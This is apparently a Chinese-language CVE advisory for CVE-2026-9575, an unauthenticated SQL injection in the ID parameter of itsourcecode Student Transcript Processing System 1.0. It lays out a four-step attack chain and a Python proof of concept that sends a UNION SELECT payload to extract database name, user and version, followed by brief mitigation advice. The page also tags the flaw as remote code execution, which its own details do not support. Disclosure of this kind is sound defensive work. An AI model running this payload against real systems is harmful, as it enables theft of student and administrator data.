IPBUF安全漏洞报告
English
CVE-2026-9575 CVSS 7.3 高危

CVE-2026-9575: 学生成绩处理系统SQL注入漏洞

披露日期: 2026-05-26

漏洞信息

漏洞编号
CVE-2026-9575
漏洞类型
SQL注入
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
itsourcecode Student Transcript Processing System

相关标签

SQL注入CVE-2026-9575itsourcecodeWeb安全远程代码执行

漏洞概述

CVE-2026-9575 是 itourcecode Student Transcript Processing System 1.0 版本中发现的一个高危安全漏洞。该漏洞源于 /admin/modules/class/index.php?view=view 文件对用户输入的 ID 参数处理不当。由于缺乏有效的过滤机制,攻击者可构造恶意 SQL 语句。此漏洞无需认证且无需用户交互即可远程利用,可能导致敏感数据泄露、数据完整性受损及服务中断。

技术细节

该漏洞属于典型的 SQL 注入漏洞。在受影响的应用中,/admin/modules/class/index.php?view=view 接口接收 HTTP 请求中的 ID 参数,并将其直接拼接到 SQL 查询语句中执行,未使用预编译语句或有效的输入清洗机制。由于 CVSS 向量显示无需用户交互 (UI:N) 且权限要求为无 (PR:N),这表明该接口可能存在未授权访问缺陷,或者注入点位于公开可访问的页面。攻击者可以通过发送包含 SQL 元字符(如单引号、UNION 查询等)的 payload,欺骗后端数据库执行恶意命令。利用此漏洞,攻击者可以绕过认证、提取敏感数据、修改数据库内容。鉴于利用代码已公开,风险极高。

攻击链分析

STEP 1
信息收集
攻击者扫描目标网络,识别运行 itourcecode Student Transcript Processing System 1.0 的服务器。
STEP 2
漏洞探测
向 /admin/modules/class/index.php?view=view 发送含有特殊字符的请求,测试 ID 参数是否存在 SQL 注入漏洞。
STEP 3
漏洞利用
构造恶意的 SQL Payload(如 UNION SELECT),通过 ID 参数提交,欺骗数据库执行非预期命令。
STEP 4
数据窃取或破坏
利用注入漏洞提取数据库中的敏感信息(如学生信息、管理员密码),或执行修改/删除操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL configuration target_url = "http://target_ip/admin/modules/class/index.php" # Payload to test for SQL Injection # Attempting to extract database version using UNION based injection payload = { "view": "view", "ID": "1' UNION SELECT NULL, NULL, database(), user(), version()-- " } try: # Sending the malicious request response = requests.get(target_url, params=payload, timeout=5) # Analyzing the response if response.status_code == 200: print("[+] Potential SQL Injection detected.") print("[+] Response snippet:", response.text[:200]) else: print("[-] Request failed with status code:", response.status_code) except Exception as e: print(f"Error connecting to target: {e}")

影响范围

itsourcecode Student Transcript Processing System 1.0

防御指南

临时缓解措施
建议立即部署 Web 应用防火墙 (WAF) 以拦截针对 ID 参数的常见 SQL 注入攻击模式。在未修复前,应严格限制外部对受影响端口的访问,仅允许受信任的 IP 地址连接,并加强数据库日志审计以检测潜在的入侵行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表